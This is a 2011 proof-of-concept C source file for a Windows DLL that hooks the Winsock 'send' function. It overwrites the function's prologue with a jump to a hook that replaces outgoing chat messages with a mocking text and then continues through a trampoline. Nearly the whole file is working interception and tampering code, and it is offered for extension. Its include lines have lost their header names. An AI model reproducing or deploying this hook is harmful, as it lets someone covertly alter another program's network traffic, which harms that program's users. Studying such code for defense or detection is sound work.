//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& // Proof of concept // // by Brian Mariani High-Tech Bridge // // www.htbridge.ch // // 01.09.2011 // // Compiled with Dev-CPP 4.9.9.2 // //&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& #include #include #include __declspec(naked) HookFunction() { char Text = "You friend is suddenly busy sorry.. :] \n"; int sizeMsg = 40; // Some Gcc inline here :\ __asm("movl %eax,0xC(%ebp)"); // Put msg param into stack __asm("pop %eax"); // Take msglen from stack __asm("movl %eax,0x10(%ebp)"); // Put msglen into stack __asm("pop %eax"); // Sub dword from stack __asm("popf"); // Restore Flags __asm("mov %edi,%edi"); __asm("push %ebp"); ////// } Harcoded preable from Ws2_32.dll -> Too lazy today :} Do a VirtualProtect and memcpy of your own. __asm("mov %ebp,%esp"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); // If you desire to add some functionalities :] __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); __asm("nop"); //1 byte JMP + 4 bytes for address. __asm("nop"); __asm("nop"); __asm("nop"); } BOOL APIENTRY DllMain (HINSTANCE hInst,DWORD reason,LPVOID reserved) { char JmpOpcode[1] = "\xE9"; char SavesOpcodes[5] = "\x90\x90\x90\x90\x90"; char OpcodesMyFunc[3] = "\x9C\x8B\xEC"; DWORD AddressToWriteTrampolineToSend; DWORD CalculateJumpFromHookFunctionToWsaSend,CalculateAddressTrampoline; DWORD lpflOldProtect = 0; DWORD OldProtect = 0; HMODULE HandleModule; DWORD AddressAPI; DWORD AddresseFakeApi; DWORD calculateJMP,JMP_TO; switch (reason) { case DLL_PROCESS_ATTACH: HandleModule = GetModuleHandle(TEXT("ws2_32.dll")); // Get the module Handle of ws2_32.dll AddressAPI = GetProcAddress(HandleModule,"send"); // Get Address of send API AddresseFakeApi = (LPDWORD)&HookFunction; // Get address of AddresseFakeApi memcpy(SavesOpcodes,AddressAPI,0x5); // Save Opcodes from preable. You can use them later with memcpy or harcode them into your HookFunction. calculateJMP = AddresseFakeApi - AddressAPI; // Calculate our Jump JMP_TO = calculateJMP - 5; VirtualProtect(AddressAPI,0x8,PAGE_READWRITE,&lpflOldProtect); // Disable memory protection. memcpy(AddressAPI,JmpOpcode,0x1); // Write Jump Opcode memcpy(AddressAPI+1,&JMP_TO,0x4); // Write jump address VirtualProtect(AddressAPI,0x8,PAGE_EXECUTE_READ,&lpflOldProtect); //Nuevo VirtualProtect(AddresseFakeApi,0x3,PAGE_READWRITE,&OldProtect); // Disable memory protection. memcpy(AddresseFakeApi,OpcodesMyFunc,0x3); // "\x9C\x8B\xEC" to -> HookFunction VirtualProtect(AddresseFakeApi,0x3,PAGE_EXECUTE_READ,&OldProtect); // Enable memory protection. //__asm("int3"); // 0xCC BreakPoint. For debugging purposes. AddressToWriteTrampolineToSend = AddresseFakeApi + 0x32; //1e // Where are we going to write JMP XXXXXXXX ? CalculateAddressTrampoline = AddressAPI + 0x5; // We must calculate our jump to the first intruction after the preable @ address -> 7651C4CD SUB ESP,10 CalculateJumpFromHookFunctionToWsaSend = CalculateAddressTrampoline - AddressToWriteTrampolineToSend - 0x5; VirtualProtect(AddressToWriteTrampolineToSend,0x8,PAGE_READWRITE,&OldProtect); // Disable memory protection @ HookFunction memcpy(AddressToWriteTrampolineToSend,JmpOpcode,0x1); //Copy uncondicional JUMP opcode memcpy(AddressToWriteTrampolineToSend+1,&CalculateJumpFromHookFunctionToWsaSend,0x4); //Copy Jump Opcode VirtualProtect(AddressToWriteTrampolineToSend,0x8,PAGE_EXECUTE_READ,&OldProtect); //Enable memory protection @ HookFunction break; } return TRUE; }